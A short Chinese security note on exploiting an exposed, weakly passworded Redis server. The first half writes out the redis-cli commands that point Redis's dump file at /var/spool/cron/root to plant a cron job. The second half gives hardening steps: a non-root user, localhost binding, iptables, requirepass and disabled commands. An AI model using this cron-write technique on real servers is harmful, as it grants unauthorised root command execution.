redis弱密码反序列化漏洞

  Security

相关文章

redis未授权登陆漏洞
CentOS7 服务器分析挖矿病毒,清理挖矿病毒 tor2web


    # 漏洞原理:允许远程访问/弱密码/root用户执行
    # 建立远程连接
    -h(IP地址)
    -p(端口)
    redis-cli -h 127.0.0.1 -p 6379
    # 配置目录
    config set dir /var/spool/cron/
    # 选定文件
    config set dbfilename root
    # 添加文本
    \n(换行符防止与乱码在一行)
    set test "\n* * * * * echo "hello" >> /root/test.txt\n"
    # 保存数据
    save

    # 漏洞修复:允许远程访问/弱密码/root用户执行
    # 指定其他用户启动-redis配置文件无法配置启动用户
    useradd -M -s /sbin/nologin [username]
    sudo -u [username] ./redis-server
    # 配置监听的网卡IP地址-redis配置文件
    bind 127.0.0.1
    # 配置iptables进行防护
    iptables -A INPUT -s 127.0.0.1 -p tcp -m tcp --dport 6379 -j ACCEPT
    iptables -A INPUT -p tcp -m tcp --dport 6379 -j DROP
    # 配置密码登录
    requirepass [password]

禁用redis命令

通过禁用部分命令禁止用户修改系统文件 – 验证对tor2web无效

rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command SHUTDOWN ""
rename-command EVAL ""